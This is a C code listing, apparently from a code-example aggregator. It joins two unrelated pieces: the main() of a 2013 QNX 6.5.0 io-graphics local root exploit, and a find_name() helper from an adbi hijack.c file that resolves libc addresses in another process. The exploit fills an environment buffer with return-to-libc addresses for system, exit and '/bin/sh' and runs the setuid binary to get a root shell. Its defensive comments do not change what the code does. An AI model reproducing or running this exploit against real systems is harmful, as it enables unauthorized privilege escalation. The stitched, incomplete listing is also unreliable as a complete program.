/*
 * Entry point of the QNX 6.5.0 x86 io-graphics proof-of-concept named in
 * the banner below.
 *
 * Three names used here are defined outside this listing: find_libc(),
 * find_string() and the VULN macro.  No headers are visible either;
 * printf/memset/memcpy/strlen/execve need <stdio.h>, <string.h> and
 * <unistd.h> for a clean compile.
 *
 * From a defensive standpoint the notable properties are what the code
 * hard-codes: one oversized environment entry, a fixed offset (429) into
 * it, and absolute addresses resolved at run time from the target's libc.
 * All of that presumes a static memory layout for the target process;
 * address-space randomization and bounds checking of environment input in
 * the target are the mitigations that invalidate these assumptions.
 */
int
main()
{
	/* hard-coded position inside env at which the three addresses are written */
	unsigned int offset = 429;
	unsigned int system_addr;
	unsigned int exit_addr;
	unsigned int binsh_addr;

	/* a single 440-byte environment entry handed to the target via envp */
	char env[440];
	char *prog[] = { "/usr/photon/bin/io-graphics", "io-graphics", NULL };
	char *envp[] = { env, NULL };

	printf("QNX 6.5.0 x86 io-graphics local root exploit by cenobyte 2013\n\n");

	/* resolved at run time by helpers external to this listing */
	system_addr = find_libc("system");
	exit_addr = find_libc("exit");
	binsh_addr = find_string("/bin/sh");

	/* fill with 0xEB, then overwrite the start with VULN (defined elsewhere) */
	memset(env, 0xEB, sizeof(env));
	memcpy(env, VULN, strlen(VULN));
	/* three 4-byte values copied in native byte order; assumes sizeof(unsigned int) == 4 */
	memcpy(env + offset, (char *)&system_addr, 4);
	memcpy(env + offset + 4, (char *)&exit_addr, 4);
	memcpy(env + offset + 8, (char *)&binsh_addr, 4);

	/* replaces this process with the target; returns only on failure, which is not checked */
	execve(prog[0], prog, envp);

	return(0);
}
예제 #2
파일: hijack.c 프로젝트: cthunter/adbi
/*
 * find_name - resolve the run-time address of a libc function in process pid.
 *
 * Reads the target's memory map, locates its libc mapping, loads that
 * library's symbol table and looks up `name`.  On success the symbol's
 * load-adjusted address (looked-up value + libc base) is stored in *addr
 * and 0 is returned; every failure prints a message to stdout and returns -1.
 *
 * load_memmap(), find_libc(), load_symtab() and lookup_func_sym() are project
 * helpers not visible in this listing.
 *
 * NOTE(review): `maps` has a fixed capacity of 1000 entries and no capacity
 * is passed to load_memmap(), so any bound is enforced inside that helper —
 * confirm.  The symtab_t returned by load_symtab() is not released here;
 * check whether it owns heap memory.
 */
static int
find_name(pid_t pid, char *name, unsigned long *addr)
{
	struct mm maps[1000];
	int nmaps = 0;
	char libc_path[256];
	unsigned long libc_base = 0;
	symtab_t symbols;

	if (load_memmap(pid, maps, &nmaps) < 0) {
		printf("cannot read memory map\n");
		return -1;
	}

	if (find_libc(libc_path, sizeof libc_path, &libc_base, maps, nmaps) < 0) {
		printf("cannot find libc\n");
		return -1;
	}

	symbols = load_symtab(libc_path);
	if (!symbols) {
		printf("cannot read symbol table\n");
		return -1;
	}

	if (lookup_func_sym(symbols, name, addr) < 0) {
		printf("cannot find %s\n", name);
		return -1;
	}

	/* relocate the looked-up value by the address libc is mapped at in pid */
	*addr += libc_base;
	return 0;
}